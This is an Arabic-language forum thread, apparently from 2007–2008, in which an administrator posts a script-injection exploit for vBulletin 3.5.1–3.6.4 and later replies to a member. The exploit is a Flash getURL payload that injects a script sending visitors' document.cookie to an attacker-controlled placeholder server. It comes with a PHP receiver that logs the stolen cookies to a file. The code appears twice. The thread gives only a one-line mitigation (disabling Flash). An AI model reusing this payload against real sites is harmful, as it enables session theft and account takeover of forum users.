ثغرة من نوع VBScript Injection في منتديات vb

18-May-2007, 06:16 PM

VBulletin SWF Script Injection Vulnerability

الاصدارات المصابة :
VBulletin VBulletin 3.6.4
VBulletin VBulletin 3.6.3
VBulletin VBulletin 3.6.2
VBulletin VBulletin 3.6.1
VBulletin VBulletin 3.6
VBulletin VBulletin 3.5.4
VBulletin VBulletin 3.5.3
VBulletin VBulletin 3.5.2
VBulletin VBulletin 3.5.1

الثغرة :

كود PHP:


			
getURL("javascript:function blab(){}var scriptNode = 

+document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie

+;blab();");

كود ملف UrPHPpage.php :

كود PHP:


			
<?

$fp = fopen("Mylog.txt","a");

if($_GET['Cookie'])

{

$str="

".date("Y-m-d h:i:s")."^".$_GET['Cookie'];

fwrite($fp,$str); 

}

fclose($fp);

?>

ارجو عدم استخدامها في الضرر

تحياتي
ابو عمار

28-Jan-2008, 09:20 PM

مشكور اخووي بس حبيت أستفسر عن كيفية أستغلال مثل هذه الثغرات وكيفية ترقيعها

29-Jan-2008, 12:43 PM

كيفة الاستثمار اخوي سهله بس جدا

ولو شرحناها مانضمن الناس الي تعرف الشرح

وترقيعها قفل الفلاش نهائياً

تحية طيبة لك اخوي العبدلي

18-May-2007, 06:16 PM	#1 (permalink)
مدير عام تاريخ التسجيل: May 2007 المشاركات: 614	ثغرة من نوع VBScript Injection في منتديات vb VBulletin SWF Script Injection Vulnerability الاصدارات المصابة : VBulletin VBulletin 3.6.4 VBulletin VBulletin 3.6.3 VBulletin VBulletin 3.6.2 VBulletin VBulletin 3.6.1 VBulletin VBulletin 3.6 VBulletin VBulletin 3.5.4 VBulletin VBulletin 3.5.3 VBulletin VBulletin 3.5.2 VBulletin VBulletin 3.5.1 الثغرة : كود PHP: `getURL("javascript:function blab(){}var scriptNode = +document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");` كود ملف UrPHPpage.php : كود PHP: `<? $fp = fopen("Mylog.txt","a"); if($_GET['Cookie']) { $str=" ".date("Y-m-d h:i:s")."^".$_GET['Cookie']; fwrite($fp,$str); } fclose($fp); ?>` ارجو عدم استخدامها في الضرر تحياتي ابو عمار __________________ منتديات شبكة آرا ويب لخدمات الانترنت http://www.arawebserv.com/vb لطلبات الاشراف والمتابعة admin@arawebserv.com

29-Jan-2008, 12:43 PM	#3 (permalink)
مدير عام تاريخ التسجيل: May 2007 المشاركات: 614	كيفة الاستثمار اخوي سهله بس جدا ولو شرحناها مانضمن الناس الي تعرف الشرح وترقيعها قفل الفلاش نهائياً تحية طيبة لك اخوي العبدلي __________________ منتديات شبكة آرا ويب لخدمات الانترنت http://www.arawebserv.com/vb لطلبات الاشراف والمتابعة admin@arawebserv.com

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
طريقة عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر رد
شركة تصميم منتديات رخيصه جد جد	عبودي	عروض البيع والشراء	0	17-Mar-2008 03:58 PM
ثغرة مجربة على 3.6.5 و 3.6.4 "جديدة" من نوع sql injection	araweb	حماية المواقع و سد ثغرات المنتديات	1	19-May-2007 02:06 PM
ثغرة في نسخة 3.6.5 من نوع Sql Injection في ملف misc.php	araweb	حماية المواقع و سد ثغرات المنتديات	0	18-May-2007 05:25 PM

28-Jan-2008, 09:20 PM	#2 (permalink)
عضو جديد تاريخ التسجيل: Jan 2008 المشاركات: 1	مشكور اخووي بس حبيت أستفسر عن كيفية أستغلال مثل هذه الثغرات وكيفية ترقيعها

ثغرة من نوع VBScript Injection في منتديات vb

حماية مواقع ، حماية منتدى ، سد ثغرات ، حماية ، ثغرات ، ترقيع